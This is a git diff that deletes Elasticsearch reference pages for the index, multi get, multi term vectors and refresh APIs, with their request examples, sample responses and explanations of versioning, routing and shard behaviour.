- -You can also retrieve metadata fields like the `_routing` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/2?routing=user1 -{ - "counter" : 1, - "tags" : ["env2"] -} --------------------------------------------------- -// TEST[continued] - -[source,console] --------------------------------------------------- -GET my-index-000001/_doc/2?routing=user1&stored_fields=tags,counter --------------------------------------------------- -// TEST[continued] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_type": "_doc", - "_id": "2", - "_version": 1, - "_seq_no" : 13, - "_primary_term" : 1, - "_routing": "user1", - "found": true, - "fields": { - "tags": [ - "env2" - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -Only leaf fields can be retrieved with the `stored_field` option. Object fields -can't be returned--if specified, the request fails. diff --git a/docs/reference/docs/index_.asciidoc b/docs/reference/docs/index_.asciidoc deleted file mode 100644 index 40575db62a0..00000000000 --- a/docs/reference/docs/index_.asciidoc +++ /dev/null @@ -1,621 +0,0 @@ -[[docs-index_]] -=== Index API -++++ -Index -++++ - -IMPORTANT: See <>. - -Adds a JSON document to the specified data stream or index and makes -it searchable. If the target is an index and the document already exists, -the request updates the document and increments its version. - -NOTE: You cannot use the index API to send update requests for existing -documents to a data stream. See <> -and <>. - -[[docs-index-api-request]] -==== {api-request-title} - -`PUT //_doc/<_id>` - -`POST //_doc/` - -`PUT //_create/<_id>` - -`POST //_create/<_id>` - -IMPORTANT: You cannot add new documents to a data stream using the -`PUT //_doc/<_id>` request format. To specify a document ID, use the -`PUT //_create/<_id>` format instead. See -<>. - -[[docs-index-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the following -<> for the target data stream, index, -or index alias: - -** To add or overwrite a document using the `PUT //_doc/<_id>` request -format, you must have the `create`, `index`, or `write` index privilege. - -** To add a document using the `POST //_doc/`, -`PUT //_create/<_id>`, or `POST //_create/<_id>` request -formats, you must have the `create_doc`, `create`, `index`, or `write` index -privilege. - -** To automatically create a data stream or index with an index API request, you -must have the `auto_configure`, `create_index`, or `manage` index privilege. - -* Automatic data stream creation requires a matching index template with data -stream enabled. See <>. - -[[docs-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) Name of the data stream or index to target. -+ -If the target doesn't exist and matches the name or wildcard (`*`) pattern of an -<>, this request creates the data stream. See -<>. -+ -If the target doesn't exist and doesn't match a data stream template, -this request creates the index. -+ -You can check for existing targets using the resolve index API. - -`<_id>`:: -(Optional, string) Unique identifier for the document. 
-+ --- -This parameter is required for the following request formats: - -* `PUT //_doc/<_id>` -* `PUT //_create/<_id>` -* `POST //_create/<_id>` - -To automatically generate a document ID, use the `POST //_doc/` request -format and omit this parameter. --- - - - -[[docs-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_seq_no] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=if_primary_term] - -[[docs-index-api-op_type]] -`op_type`:: -(Optional, enum) Set to `create` to only index the document -if it does not already exist (_put if absent_). If a document with the specified -`_id` already exists, the indexing operation will fail. Same as using the -`/_create` endpoint. Valid values: `index`, `create`. -If document id is specified, it defaults to `index`. Otherwise, it defaults to `create`. -+ -NOTE: If the request targets a data stream, an `op_type` of `create` is -required. See <>. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=pipeline] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`timeout`:: -+ --- -(Optional, <>) -Period the request waits for the following operations: - -* <> -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=doc-version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=require-alias] - -[[docs-index-api-request-body]] -==== {api-request-body-title} - -``:: -(Required, string) Request body contains the JSON source for the document -data. - -[[docs-index-api-response-body]] -==== {api-response-body-title} - -`_shards`:: -Provides information about the replication process of the index operation. - -`_shards.total`:: -Indicates how many shard copies (primary and replica shards) the index operation -should be executed on. - -`_shards.successful`:: -Indicates the number of shard copies the index operation succeeded on. -When the index operation is successful, `successful` is at least 1. -+ -NOTE: Replica shards might not all be started when an indexing operation -returns successfully--by default, only the primary is required. Set -`wait_for_active_shards` to change this default behavior. See -<>. - -`_shards.failed`:: -An array that contains replication-related errors in the case an index operation -failed on a replica shard. 0 indicates there were no failures. - -`_index`:: -The name of the index the document was added to. - -`_type`:: -The document type. {es} indices now support a single document type, `_doc`. - -`_id`:: -The unique identifier for the added document. - -`_version`:: -The document version. Incremented each time the document is updated. - -`_seq_no`:: -The sequence number assigned to the document for the indexing operation. -Sequence numbers are used to ensure an older version of a document -doesn’t overwrite a newer version. See <>. - -`_primary_term`:: -The primary term assigned to the document for the indexing operation. -See <>. - -`result`:: -The result of the indexing operation, `created` or `updated`. 
- -[[docs-index-api-desc]] -==== {api-description-title} - -You can index a new JSON document with the `_doc` or `_create` resource. Using -`_create` guarantees that the document is only indexed if it does not already -exist. To update an existing document, you must use the `_doc` resource. - -[[index-creation]] -===== Automatically create data streams and indices - -If request's target doesn't exist and matches an -<>, the index operation automatically creates the data stream. See -<>. - -If the target doesn't exist and doesn't match a data stream template, -the operation automatically creates the index and applies any matching -<>. - -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and `synthetics-*-*` index -patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. If you use {agent}, assign your index templates a priority -lower than `100` to avoid overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -If no mapping exists, the index operation -creates a dynamic mapping. By default, new fields and objects are -automatically added to the mapping if needed. For more information about field -mapping, see <> and the <> API. - -Automatic index creation is controlled by the `action.auto_create_index` -setting. This setting defaults to `true`, which allows any index to be created -automatically. You can modify this setting to explicitly allow or block -automatic creation of indices that match specified patterns, or set it to -`false` to disable automatic index creation entirely. Specify a -comma-separated list of patterns you want to allow, or prefix each pattern with -`+` or `-` to indicate whether it should be allowed or blocked. When a list is -specified, the default behaviour is to disallow. - -IMPORTANT: The `action.auto_create_index` setting only affects the automatic -creation of indices. It does not affect the creation of data streams. - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "persistent": { - "action.auto_create_index": "my-index-000001,index10,-index1*,+ind*" <1> - } -} - -PUT _cluster/settings -{ - "persistent": { - "action.auto_create_index": "false" <2> - } -} - -PUT _cluster/settings -{ - "persistent": { - "action.auto_create_index": "true" <3> - } -} --------------------------------------------------- - -<1> Allow auto-creation of indices called `my-index-000001` or `index10`, block the -creation of indices that match the pattern `index1*`, and allow creation of -any other indices that match the `ind*` pattern. Patterns are matched in -the order specified. - -<2> Disable automatic index creation entirely. - -<3> Allow automatic creation of any index. This is the default. - -[discrete] -[[operation-type]] -===== Put if absent - -You can force a create operation by using the `_create` resource or -setting the `op_type` parameter to _create_. In this case, -the index operation fails if a document with the specified ID -already exists in the index. 
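For example, a minimal sketch: if `my-index-000001` already contains a document with the ID `1`, the following request is rejected with a `409` version conflict rather than overwriting the existing document.

[source,console]
--------------------------------------------------
PUT my-index-000001/_create/1
{
  "message": "only indexed if no document with ID 1 exists yet"
}
--------------------------------------------------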
- -[discrete] -[[create-document-ids-automatically]] -===== Create document IDs automatically - -When using the `POST //_doc/` request format, the `op_type` is -automatically set to `create` and the index operation generates a unique ID for -the document. - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc/ -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - }, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "W0tpsmIBdwcYyG50zbta", - "_version": 1, - "_seq_no": 0, - "_primary_term": 1, - "result": "created" -} --------------------------------------------------- -// TESTRESPONSE[s/W0tpsmIBdwcYyG50zbta/$body._id/ s/"successful": 2/"successful": 1/] - -[discrete] -[[optimistic-concurrency-control-index]] -===== Optimistic concurrency control - -Index operations can be made conditional and only be performed if the last -modification to the document was assigned the sequence number and primary -term specified by the `if_seq_no` and `if_primary_term` parameters. If a -mismatch is detected, the operation will result in a `VersionConflictException` -and a status code of 409. See <> for more details. - -[discrete] -[[index-routing]] -===== Routing - -By default, shard placement -- or `routing` -- is controlled by using a -hash of the document's id value. For more explicit control, the value -fed into the hash function used by the router can be directly specified -on a per-operation basis using the `routing` parameter. For example: - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc?routing=kimchy -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -In this example, the document is routed to a shard based on -the `routing` parameter provided: "kimchy". - -When setting up explicit mapping, you can also use the `_routing` field -to direct the index operation to extract the routing value from the -document itself. This does come at the (very minimal) cost of an -additional document parsing pass. If the `_routing` mapping is defined -and set to be `required`, the index operation will fail if no routing -value is provided or extracted. - -NOTE: Data streams do not support custom routing. Instead, target the -appropriate backing index for the stream. - -[discrete] -[[index-distributed]] -===== Distributed - -The index operation is directed to the primary shard based on its route -(see the Routing section above) and performed on the actual node -containing this shard. After the primary shard completes the operation, -if needed, the update is distributed to applicable replicas. - -[discrete] -[[index-wait-for-active-shards]] -===== Active shards - -To improve the resiliency of writes to the system, indexing operations -can be configured to wait for a certain number of active shard copies -before proceeding with the operation. If the requisite number of active -shard copies are not available, then the write operation must wait and -retry, until either the requisite shard copies have started or a timeout -occurs. 
By default, write operations only wait for the primary shards -to be active before proceeding (i.e. `wait_for_active_shards=1`). -This default can be overridden in the index settings dynamically -by setting `index.write.wait_for_active_shards`. To alter this behavior -per operation, the `wait_for_active_shards` request parameter can be used. - -Valid values are `all` or any positive integer up to the total number -of configured copies per shard in the index (which is `number_of_replicas+1`). -Specifying a negative value or a number greater than the number of -shard copies will throw an error. - -For example, suppose we have a cluster of three nodes, `A`, `B`, and `C` and -we create an index `index` with the number of replicas set to 3 (resulting in -4 shard copies, one more copy than there are nodes). If we -attempt an indexing operation, by default the operation will only ensure -the primary copy of each shard is available before proceeding. This means -that even if `B` and `C` went down, and `A` hosted the primary shard copies, -the indexing operation would still proceed with only one copy of the data. -If `wait_for_active_shards` is set on the request to `3` (and all 3 nodes -are up), then the indexing operation will require 3 active shard copies -before proceeding, a requirement which should be met because there are 3 -active nodes in the cluster, each one holding a copy of the shard. However, -if we set `wait_for_active_shards` to `all` (or to `4`, which is the same), -the indexing operation will not proceed as we do not have all 4 copies of -each shard active in the index. The operation will timeout -unless a new node is brought up in the cluster to host the fourth copy of -the shard. - -It is important to note that this setting greatly reduces the chances of -the write operation not writing to the requisite number of shard copies, -but it does not completely eliminate the possibility, because this check -occurs before the write operation commences. Once the write operation -is underway, it is still possible for replication to fail on any number of -shard copies but still succeed on the primary. The `_shards` section of the -write operation's response reveals the number of shard copies on which -replication succeeded/failed. - -[source,js] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - } -} --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[index-refresh]] -===== Refresh - -Control when the changes made by this request are visible to search. See -<>. - -[discrete] -[[index-noop]] -===== Noop updates - -When updating a document using the index API a new version of the document is -always created even if the document hasn't changed. If this isn't acceptable -use the `_update` API with `detect_noop` set to true. This option isn't -available on the index API because the index API doesn't fetch the old source -and isn't able to compare it against the new source. - -There isn't a hard and fast rule about when noop updates aren't acceptable. -It's a combination of lots of factors like how frequently your data source -sends updates that are actually noops and how many queries per second -Elasticsearch runs on the shard receiving the updates. - -[discrete] -[[timeout]] -===== Timeout - -The primary shard assigned to perform the index operation might not be -available when the index operation is executed. 
Some reasons for this -might be that the primary shard is currently recovering from a gateway -or undergoing relocation. By default, the index operation will wait on -the primary shard to become available for up to 1 minute before failing -and responding with an error. The `timeout` parameter can be used to -explicitly specify how long it waits. Here is an example of setting it -to 5 minutes: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?timeout=5m -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -[discrete] -[[index-versioning]] -===== Versioning - -Each indexed document is given a version number. By default, -internal versioning is used that starts at 1 and increments -with each update, deletes included. Optionally, the version number can be -set to an external value (for example, if maintained in a -database). To enable this functionality, `version_type` should be set to -`external`. The value provided must be a numeric, long value greater than or equal to 0, -and less than around 9.2e+18. - -When using the external version type, the system checks to see if -the version number passed to the index request is greater than the -version of the currently stored document. If true, the document will be -indexed and the new version number used. If the value provided is less -than or equal to the stored document's version number, a version -conflict will occur and the index operation will fail. For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?version=2&version_type=external -{ - "user": { - "id": "elkbee" - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: Versioning is completely real time, and is not affected by the -near real time aspects of search operations. If no version is provided, -then the operation is executed without any version checks. - -In the previous example, the operation will succeed since the supplied -version of 2 is higher than -the current document version of 1. If the document was already updated -and its version was set to 2 or higher, the indexing command will fail -and result in a conflict (409 http status code). - -A nice side effect is that there is no need to maintain strict ordering -of async indexing operations executed as a result of changes to a source -database, as long as version numbers from the source database are used. -Even the simple case of updating the Elasticsearch index using data from -a database is simplified if external versioning is used, as only the -latest version will be used if the index operations arrive out of order for -whatever reason. - -[discrete] -[[index-version-types]] -===== Version types - -In addition to the `external` version type, Elasticsearch -also supports other types for specific use cases: - -[[_version_types]] -`internal`:: Only index the document if the given version is identical to the version -of the stored document. - -`external` or `external_gt`:: Only index the document if the given version is strictly higher -than the version of the stored document *or* if there is no existing document. The given -version will be used as the new version and will be stored with the new document. The supplied -version must be a non-negative long number. 
- -`external_gte`:: Only index the document if the given version is *equal* or higher -than the version of the stored document. If there is no existing document -the operation will succeed as well. The given version will be used as the new version -and will be stored with the new document. The supplied version must be a non-negative long number. - -NOTE: The `external_gte` version type is meant for special use cases and -should be used with care. If used incorrectly, it can result in loss of data. -There is another option, `force`, which is deprecated because it can cause -primary and replica shards to diverge. - -[[docs-index-api-example]] -==== {api-examples-title} - -Insert a JSON document into the `my-index-000001` index with an `_id` of 1: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - }, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no": 0, - "_primary_term": 1, - "result": "created" -} --------------------------------------------------- -// TESTRESPONSE[s/"successful": 2/"successful": 1/] - -Use the `_create` resource to index a document into the `my-index-000001` index if -no document with that ID exists: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_create/1 -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -Set the `op_type` parameter to _create_ to index a document into the `my-index-000001` -index if no document with that ID exists: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?op_type=create -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- diff --git a/docs/reference/docs/multi-get.asciidoc b/docs/reference/docs/multi-get.asciidoc deleted file mode 100644 index ae29c645702..00000000000 --- a/docs/reference/docs/multi-get.asciidoc +++ /dev/null @@ -1,301 +0,0 @@ -[[docs-multi-get]] -=== Multi get (mget) API -++++ -Multi get -++++ - -Retrieves multiple JSON documents by ID. - -[source,console] --------------------------------------------------- -GET /_mget -{ - "docs": [ - { - "_index": "my-index-000001", - "_id": "1" - }, - { - "_index": "my-index-000001", - "_id": "2" - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-multi-get-api-request]] -==== {api-request-title} - -`GET /_mget` - -`GET //_mget` - -[[docs-multi-get-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-multi-get-api-desc]] -==== {api-description-title} - -You use `mget` to retrieve multiple documents from one or more indices. -If you specify an index in the request URI, you only need to specify the document IDs in the request body. - -[[mget-security]] -===== Security - -See <>. 
- -[[multi-get-partial-responses]] -===== Partial responses - -To ensure fast responses, the multi get API responds with partial results if one or more shards fail. -See <> for more information. - -[[docs-multi-get-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Name of the index to retrieve documents from when `ids` are specified, -or when a document in the `docs` array does not specify an index. - -[[docs-multi-get-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stored_fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -[[docs-multi-get-api-request-body]] -==== {api-request-body-title} - -`docs`:: -(Optional, array) The documents you want to retrieve. -Required if no index is specified in the request URI. -You can specify the following attributes for each -document: -+ --- -`_id`:: -(Required, string) The unique document ID. - -`_index`:: -(Optional, string) -The index that contains the document. -Required if no index is specified in the request URI. - -`_routing`:: -(Optional, string) The key for the primary shard the document resides on. -Required if routing is used during indexing. - -`_source`:: -(Optional, Boolean) If `false`, excludes all `_source` fields. Defaults to `true`. -`source_include`::: -(Optional, array) The fields to extract and return from the `_source` field. -`source_exclude`::: -(Optional, array) The fields to exclude from the returned `_source` field. - -`_stored_fields`:: -(Optional, array) The stored fields you want to retrieve. --- - -`ids`:: -(Optional, array) The IDs of the documents you want to retrieve. -Allowed when the index is specified in the request URI. - -[[multi-get-api-response-body]] -==== {api-response-body-title} - -The response includes a `docs` array that contains the documents in the order specified in the request. -The structure of the returned documents is similar to that returned by the <> API. -If there is a failure getting a particular document, the error is included in place of the document. 
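For instance, here is an abbreviated sketch (not a literal response) of a partial result where the first document is found and the lookup for the second fails; the failed entry carries an `error` object in place of the usual document fields:

[source,js]
--------------------------------------------------
{
  "docs": [
    {
      "_index": "my-index-000001",
      "_type": "_doc",
      "_id": "1",
      "_version": 1,
      "found": true,
      "_source": { ... }
    },
    {
      "_index": "my-index-000001",
      "_type": "_doc",
      "_id": "2",
      "error": {
        "type": "...",
        "reason": "..."
      }
    }
  ]
}
--------------------------------------------------
// NOTCONSOLE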
- -[[docs-multi-get-api-example]] -==== {api-examples-title} - -[[mget-ids]] -===== Get documents by ID - -If you specify an index in the request URI, only the document IDs are required in the request body: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mget -{ - "docs": [ - { - "_type": "_doc", - "_id": "1" - }, - { - "_type": "_doc", - "_id": "2" - } - ] -} --------------------------------------------------- - -And type: - -[source,console] --------------------------------------------------- -GET /test/_doc/_mget -{ - "docs": [ - { - "_id": "1" - }, - { - "_id": "2" - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -You can use the `ids` element to simplify the request: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mget -{ - "ids" : ["1", "2"] -} --------------------------------------------------- -// TEST[setup:my_index] - -[[mget-source-filtering]] -===== Filter source fields - -By default, the `_source` field is returned for every document (if stored). -Use the `_source` and `_source_include` or `source_exclude` attributes to -filter what fields are returned for a particular document. -You can include the `_source`, `_source_includes`, and `_source_excludes` query parameters in the -request URI to specify the defaults to use when there are no per-document instructions. - -For example, the following request sets `_source` to false for document 1 to exclude the -source entirely, retrieves `field3` and `field4` from document 2, and retrieves the `user` field -from document 3 but filters out the `user.location` field. - -[source,console] --------------------------------------------------- -GET /_mget -{ - "docs": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_source": false - }, - { - "_index": "test", - "_type": "_doc", - "_id": "2", - "_source": [ "field3", "field4" ] - }, - { - "_index": "test", - "_type": "_doc", - "_id": "3", - "_source": { - "include": [ "user" ], - "exclude": [ "user.location" ] - } - } - ] -} --------------------------------------------------- - -[[mget-fields]] -===== Get stored fields - -Use the `stored_fields` attribute to specify the set of stored fields you want -to retrieve. Any requested fields that are not stored are ignored. -You can include the `stored_fields` query parameter in the request URI to specify the defaults -to use when there are no per-document instructions. - -For example, the following request retrieves `field1` and `field2` from document 1, and -`field3` and `field4`from document 2: - -[source,console] --------------------------------------------------- -GET /_mget -{ - "docs": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "stored_fields": [ "field1", "field2" ] - }, - { - "_index": "test", - "_type": "_doc", - "_id": "2", - "stored_fields": [ "field3", "field4" ] - } - ] -} --------------------------------------------------- - -The following request retrieves `field1` and `field2` from all documents by default. -These default fields are returned for document 1, but -overridden to return `field3` and `field4` for document 2. 
- -[source,console] --------------------------------------------------- -GET /test/_doc/_mget?stored_fields=field1,field2 -{ - "docs": [ - { - "_id": "1" - }, - { - "_id": "2", - "stored_fields": [ "field3", "field4" ] - } - ] -} --------------------------------------------------- - -[[mget-routing]] -===== Specify document routing - -If routing is used during indexing, you need to specify the routing value to retrieve documents. -For example, the following request fetches `test/_doc/2` from the shard corresponding to routing key `key1`, -and fetches `test/_doc/1` from the shard corresponding to routing key `key2`. - -[source,console] --------------------------------------------------- -GET /_mget?routing=key1 -{ - "docs": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "routing": "key2" - }, - { - "_index": "test", - "_type": "_doc", - "_id": "2" - } - ] -} --------------------------------------------------- diff --git a/docs/reference/docs/multi-termvectors.asciidoc b/docs/reference/docs/multi-termvectors.asciidoc deleted file mode 100644 index 90b31238a5c..00000000000 --- a/docs/reference/docs/multi-termvectors.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[[docs-multi-termvectors]] -=== Multi term vectors API -++++ -Multi term vectors -++++ - -Retrieves multiple term vectors with a single request. - -[source,console] --------------------------------------------------- -POST /_mtermvectors -{ - "docs": [ - { - "_index": "my-index-000001", - "_id": "2", - "term_statistics": true - }, - { - "_index": "my-index-000001", - "_id": "1", - "fields": [ - "message" - ] - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-multi-termvectors-api-request]] -==== {api-request-title} - -`POST /_mtermvectors` - -`POST //_mtermvectors` - -[[docs-multi-termvectors-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-multi-termvectors-api-desc]] -==== {api-description-title} - -You can specify existing documents by index and ID or -provide artificial documents in the body of the request. -You can specify the index in the request body or request URI. - -The response contains a `docs` array with all the fetched termvectors. -Each element has the structure provided by the <> -API. - -See the <> API for more information about the information -that can be included in the response. - -[[docs-multi-termvectors-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Name of the index that contains the documents. 
- -[[docs-multi-termvectors-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=field_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=offsets] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=payloads] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=positions] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=term_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -[discrete] -[[docs-multi-termvectors-api-example]] -==== {api-examples-title} - -If you specify an index in the request URI, the index does not need to be specified for each documents -in the request body: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_mtermvectors -{ - "docs": [ - { - "_id": "2", - "fields": [ - "message" - ], - "term_statistics": true - }, - { - "_id": "1" - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -If all requested documents are in same index and the parameters are the same, you can use the -following simplified syntax: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_mtermvectors -{ - "ids": [ "1", "2" ], - "parameters": { - "fields": [ - "message" - ], - "term_statistics": true - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-multi-termvectors-artificial-doc]] -===== Artificial documents - -You can also use `mtermvectors` to generate term vectors for _artificial_ documents provided -in the body of the request. The mapping used is determined by the specified `_index`. - -[source,console] --------------------------------------------------- -POST /_mtermvectors -{ - "docs": [ - { - "_index": "my-index-000001", - "doc" : { - "message" : "test test test" - } - }, - { - "_index": "my-index-000001", - "doc" : { - "message" : "Another test ..." - } - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/docs/refresh.asciidoc b/docs/reference/docs/refresh.asciidoc deleted file mode 100644 index 2bbac2c0b1c..00000000000 --- a/docs/reference/docs/refresh.asciidoc +++ /dev/null @@ -1,111 +0,0 @@ -[[docs-refresh]] -=== `?refresh` - -The <>, <>, <>, and -<> APIs support setting `refresh` to control when changes made -by this request are made visible to search. These are the allowed values: - -Empty string or `true`:: - -Refresh the relevant primary and replica shards (not the whole index) -immediately after the operation occurs, so that the updated document appears -in search results immediately. This should *ONLY* be done after careful thought -and verification that it does not lead to poor performance, both from an -indexing and a search standpoint. - -`wait_for`:: - -Wait for the changes made by the request to be made visible by a refresh before -replying. This doesn't force an immediate refresh, rather, it waits for a -refresh to happen. Elasticsearch automatically refreshes shards that have changed -every `index.refresh_interval` which defaults to one second. 
That setting is -<>. Calling the <> API or -setting `refresh` to `true` on any of the APIs that support it will also -cause a refresh, in turn causing already running requests with `refresh=wait_for` -to return. - -`false` (the default):: - -Take no refresh related actions. The changes made by this request will be made -visible at some point after the request returns. - -[discrete] -==== Choosing which setting to use -// tag::refresh-default[] -Unless you have a good reason to wait for the change to become visible, always -use `refresh=false` (the default setting). The simplest and fastest choice is to omit the `refresh` parameter from the URL. - -If you absolutely must have the changes made by a request visible synchronously -with the request, you must choose between putting more load on -Elasticsearch (`true`) and waiting longer for the response (`wait_for`). -// end::refresh-default[] -Here are a few points that should inform that decision: - -* The more changes being made to the index the more work `wait_for` saves -compared to `true`. In the case that the index is only changed once every -`index.refresh_interval` then it saves no work. -* `true` creates less efficient indexes constructs (tiny segments) that must -later be merged into more efficient index constructs (larger segments). Meaning -that the cost of `true` is paid at index time to create the tiny segment, at -search time to search the tiny segment, and at merge time to make the larger -segments. -* Never start multiple `refresh=wait_for` requests in a row. Instead batch them -into a single bulk request with `refresh=wait_for` and Elasticsearch will start -them all in parallel and return only when they have all finished. -* If the refresh interval is set to `-1`, disabling the automatic refreshes, -then requests with `refresh=wait_for` will wait indefinitely until some action -causes a refresh. Conversely, setting `index.refresh_interval` to something -shorter than the default like `200ms` will make `refresh=wait_for` come back -faster, but it'll still generate inefficient segments. -* `refresh=wait_for` only affects the request that it is on, but, by forcing a -refresh immediately, `refresh=true` will affect other ongoing request. In -general, if you have a running system you don't wish to disturb then -`refresh=wait_for` is a smaller modification. - -[discrete] -[[refresh_wait_for-force-refresh]] -==== `refresh=wait_for` Can Force a Refresh - -If a `refresh=wait_for` request comes in when there are already -`index.max_refresh_listeners` (defaults to 1000) requests waiting for a refresh -on that shard then that request will behave just as though it had `refresh` set -to `true` instead: it will force a refresh. This keeps the promise that when a -`refresh=wait_for` request returns that its changes are visible for search -while preventing unchecked resource usage for blocked requests. If a request -forced a refresh because it ran out of listener slots then its response will -contain `"forced_refresh": true`. - -Bulk requests only take up one slot on each shard that they touch no matter how -many times they modify the shard. 
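To make the batching advice above concrete, here is a sketch (index name and documents are illustrative) of folding two writes into a single `_bulk` request with `refresh=wait_for`, which consumes only one listener slot on each shard it touches:

[source,console]
--------------------------------------------------
POST /test/_bulk?refresh=wait_for
{"index": {"_id": "1"}}
{"test": "test"}
{"index": {"_id": "2"}}
{"test": "test"}
--------------------------------------------------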
